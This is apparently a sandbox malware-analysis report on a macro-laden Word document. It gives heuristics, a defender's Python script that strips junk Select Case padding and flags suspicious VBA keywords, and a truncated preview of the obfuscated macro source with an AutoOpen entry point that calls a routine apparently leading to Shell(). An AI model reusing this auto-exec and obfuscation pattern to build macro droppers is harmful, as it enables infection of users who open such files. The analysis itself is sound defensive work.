Verdict: MALICIOUS (Risk Score 142)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Word document (an OLE file whose macro project derives from `Normal.ThisDocument`) carrying VBA macros, as flagged by the OLE_VBA_MACROS and OLE_VBA_AUTOOPEN heuristics. The critical OLE_VBA_SHELL hit indicates a Shell() call in the macro code, the usual way such documents launch a dropped or downloaded second stage. The `Sub Autoopen()` entry point means that code runs as soon as the document is opened with macros enabled, and its `On Error Resume Next` suppresses any runtime error that would otherwise alert the user. The recovered source is heavily padded with junk code: repeated `Select Case` blocks keyed on variables that are never assigned anywhere in the preview, with random numeric case labels, so none of their branches can execute. Once that padding is ignored, the only live statement in Autoopen is the call `dCzIVMCGIzH (KIQKO + sTuhFQAJhGL + bprMiU)`, which passes an expression built from three variables to a routine defined further down the 57 KB module; the Shell() call itself lies beyond the truncated preview. The single extracted URL is the DrawingML schema namespace, ordinary Office boilerplate rather than a download location.
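The junk-code pattern visible in the preview is mechanical enough to strip automatically. The following Python is an added example, not tooling from the analyzer that produced this report: it removes every `Select Case` block whose selector variable is never assigned or passed as a parameter (an unassigned Variant is Empty, which compares equal only to 0 and "", so numeric labels such as `Case 49225` never match), then lists what actually runs in each Sub and flags the same two signals the heuristics above key on, an auto-exec entry point and a Shell()-style keyword. The input is constructed: `Sub Autoopen` is copied from the macro preview on this page, but the body of `dCzIVMCGIzH` is not in the preview, so the stand-in given here (a `Shell` call) is hypothetical and only serves to let the call graph resolve end to end.

```python
"""Strip dead Select Case padding from obfuscated VBA and triage what remains.
Added example; not code from the analyzer that produced this report."""
import re

# Auto-exec Sub names Office runs as soon as macros are enabled.
AUTOEXEC = {"autoopen", "auto_open", "autoexec", "document_open",
            "workbook_open", "autoclose", "auto_close", "document_close"}
# Keywords an OLE_VBA_SHELL-style heuristic keys on (non-exhaustive).
SUSPICIOUS = re.compile(
    r"\b(Shell|CreateObject|Environ|URLDownloadToFile|XMLHTTP|ADODB\.Stream|PowerShell)\b",
    re.I)
SUB = re.compile(r"^(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(([^)]*)\)", re.I)
SELECT = re.compile(r"^Select\s+Case\s+(\w+)\s*$", re.I)
END_SELECT = re.compile(r"^End\s+Select\b", re.I)
ASSIGN = re.compile(r"^(?:Set\s+)?(\w+)\s*=", re.I)


def _live_names(lines):
    """Names that can hold a value: assigned anywhere, or received as a parameter."""
    names = set()
    for ln in lines:
        s = ln.strip()
        m = ASSIGN.match(s)
        if m:
            names.add(m.group(1).lower())
        m = SUB.match(s)
        if m:
            for p in m.group(2).split(","):
                if p.strip():  # "ByVal x As String" -> "x"
                    names.add(re.split(r"\s+As\s+", p.strip(), flags=re.I)[0].split()[-1].lower())
    return names


def strip_dead_select(src):
    """Drop each `Select Case X ... End Select` whose selector X is never assigned.
    Returns (stripped_source, number_of_blocks_removed)."""
    lines = src.splitlines()
    live = _live_names(lines)
    out, removed, nest = [], 0, 0
    for ln in lines:
        s = ln.strip()
        if nest:  # inside a dead block: track nesting, emit nothing
            if SELECT.match(s):
                nest += 1
            elif END_SELECT.match(s):
                nest -= 1
            continue
        m = SELECT.match(s)
        if m and m.group(1).lower() not in live:
            nest, removed = 1, removed + 1
            continue
        out.append(ln)
    return "\n".join(out), removed


def triage(src):
    """Per-Sub live statements plus auto-exec entry points and suspicious keywords."""
    stripped, removed = strip_dead_select(src)
    report = {"dead_select_blocks": removed, "entry_points": [],
              "suspicious": [], "live": {}}
    current = None
    for ln in stripped.splitlines():
        s = ln.strip()
        m = SUB.match(s)
        if m:
            current = m.group(1)
            report["live"][current] = []
            if current.lower() in AUTOEXEC:
                report["entry_points"].append(current)
            continue
        if re.match(r"^End\s+(Sub|Function)\b", s, re.I):
            current = None
            continue
        if current and s and not s.lower().startswith("on error"):
            report["live"][current].append(s)
        for kw in SUSPICIOUS.findall(s):
            report["suspicious"].append((current, kw))
    return report


# Constructed input: Autoopen is quoted from the preview on this page; the body
# of dCzIVMCGIzH is NOT in the preview and is a hypothetical stand-in.
SAMPLE = '''Attribute VB_Name = "GuwFPTcvSX"
Sub Autoopen()
On Error Resume Next
Select Case OvDYhn
Case 49225
trEDzz = LboAGz
tozhtL = Round(78796)
FUiBv = Hex(ESNYib - ChrW(qJiuq))
VIzEY = UBPbAt
Case 26762
ZmkVzD = CByte(98727)
JacYW = Log(DfTnDs)
End Select
dCzIVMCGIzH (KIQKO + sTuhFQAJhGL + bprMiU)
Select Case bEZJwm
Case 38283
zWbAQ = wjHNqV
Case 19051
zhIczi = CByte(20621)
End Select
End Sub
Sub dCzIVMCGIzH(cmd)
Select Case PLzqw
Case 71204
uBrTz = Round(1934)
End Select
Shell cmd, vbHide
End Sub
'''

if __name__ == "__main__":
    r = triage(SAMPLE)
    print("dead Select Case blocks removed:", r["dead_select_blocks"])
    print("auto-exec entry points:", r["entry_points"])
    for name, stmts in r["live"].items():
        print(f"{name}: {stmts}")
    print("suspicious keywords:", r["suspicious"])
```

Run it against the full `macros.bas` carved above and the live statements collapse to a handful of lines per Sub. The stripper is deliberately conservative: a selector that is an expression rather than a bare name is kept, and a block containing `Case 0` or `Case ""` could legitimately match an Empty selector, so check those by hand before trusting the output.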
Heuristics (5)

- VBA macros detected [OLE_VBA_MACROS] (medium, 2 related findings): Document contains VBA macro code.
- Shell() call in VBA [OLE_VBA_SHELL] (critical): Shell() call in VBA.
- AutoOpen macro [OLE_VBA_AUTOOPEN] (high): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker [OLE_LEGACY_WORDBASIC_AUTOEXEC] (medium): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [EMBEDDED_URL] (info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57347 bytes | 91d4809cd9d829c285629940a6ac2870758e35c8da0f2b1c3b4a31fa643d4e75 |
Preview script (first 1,000 lines of the extracted script; the copy reproduced here is truncated)

```vba
Attribute VB_Name = "GuwFPTcvSX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RdaKs(EDtwB)
Select Case CrAjvD
Case 11003
wtGhqV = izZuj
VpQYv = Round(42378)
XsZZQ = Hex(XXYjT - ChrW(EJFXWs))
XEWDT = SFjBj
Case 15381
jELGU = CByte(63999)
QzqKT = Log(ziOQS)
End Select
End Sub
Sub fawzBo(VwUqV)
Select Case YTNAww
Case 6140
bEaNMk = DnqQj
cZiGJR = Round(29064)
TvHUV = Hex(mmiQRO - ChrW(EWYjp))
rRKiZ = wvuito
Case 63378
iHISsq = CByte(80130)
RIZzUm = Log(CKWUN)
End Select
Select Case tIQhi
Case 45473
sHlcka = wOFrz
PABFa = Round(34421)
XrUWT = Hex(Qkwsl - ChrW(SqiJX))
OtMboF = VzHtGL
Case 13230
MbBnO = CByte(16893)
KpzVU = Log(jXjqiI)
End Select
Select Case YwwCO
Case 82978
TIrrji = GOhWJn
iXdSkw = Round(77703)
bCcCvs = Hex(fwYXJ - ChrW(CzFpqm))
IzUUU = pbSjd
Case 84966
rhpOi = CByte(67329)
tjjzm = Log(zjaXdu)
End Select
End Sub
Sub OSciI(hClMOv)
Select Case zGVIrK
Case 13469
jZPWhq = IBvGi
wYFGGw = Round(3106)
HXUCHi = Hex(LRjSnb - ChrW(tMLaqT))
kRIMzD = PBkOFl
Case 47744
vTaMU = CByte(94259)
OnuEOf = Log(ufFiEW)
End Select
Select Case MqIbL
Case 91753
vEipJ = RrAiwz
CURup = Round(4447)
HEIXh = Hex(wjdRl - ChrW(BUSjM))
EobDf = jHVDrZ
Case 27038
JYIrvL = CByte(15930)
uiOit = Log(vjjlEf)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case OvDYhn
Case 49225
trEDzz = LboAGz
tozhtL = Round(78796)
FUiBv = Hex(ESNYib - ChrW(qJiuq))
VIzEY = UBPbAt
Case 26762
ZmkVzD = CByte(98727)
JacYW = Log(DfTnDs)
End Select
dCzIVMCGIzH (KIQKO + sTuhFQAJhGL + bprMiU)
Select Case bEZJwm
Case 38283
zWbAQ = wjHNqV
OdULj = Round(55297)
RRNwD = Hex(RwFKqQ - ChrW(FLloJ))
zcFjzn = MMaFwM
Case 19051
zhIczi = CByte(20621)
izWZwS = Log(sfBld)
End Select
End Sub
Sub LiOKEZ(YAMdG)
Select Case IdcLMT
Case 77949
bmdOCu = iZwbj
lzuSs = Round(8930)
bdksT = Hex(JZPTo - ChrW(oRjvk))
BfvqbP = abWii
Case 87968
OiCwB = CByte(70076)
hkjTGI = Log(rjBDJ)
End Select
Select Case rZKkC
Case 40559
stnujZ = DGPlu
BTuLX = Round(40226)
uirVa = Hex(XcpYR - ChrW(juCozo))
jnElUP = JUXiw
Case 26540
NvJBRU = CByte(15745)
sOiwq = Log(GwfzW)
End Select
Select Case oUpzXF
Case 32664
DEKZD = Twsnf
iiupC = Round(41775)
vDVsh = Hex(cssGMd - ChrW(DswnE))
ubuHG = RCGKZz
Case 90683
fVMhM = CByte(55981)
aVarjJ = Log(RlfHl)
End Select
End Sub
Sub azBvPA(ZWiSG)
Select Case bjijR
Case 51502
KUGUPa = wkViSN
bhTRS = Round(24120)
YEmHl = Hex(hmjEO - ChrW(KjGrjf))
RRoAEz = PAwOPz
Case 27389
mQUNi = CByte(20395)
MBQQm = Log(RUqml)
End Select
End Sub
Attribute VB_Name = "uwkDiHszhnU"
Sub PSzzqW(AiQEm)
Select Case oNpzfH
Case 53868
WTRBMm = mKTYh
AUFUiU = Round(35900)
wdrzTu = Hex(CCBfsM - ChrW(wfvdkO))
TzjFJ = skcBnJ
```

... (truncated)